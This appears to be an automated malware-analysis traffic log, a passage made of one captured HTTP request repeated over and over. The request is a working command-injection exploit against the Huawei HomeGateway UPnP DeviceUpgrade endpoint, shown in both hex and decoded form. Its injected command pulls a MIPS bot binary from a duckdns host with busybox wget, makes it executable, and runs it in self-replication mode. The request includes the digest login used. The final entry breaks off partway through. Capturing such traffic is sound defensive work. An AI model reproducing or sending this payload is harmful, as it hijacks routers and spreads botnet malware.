            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r 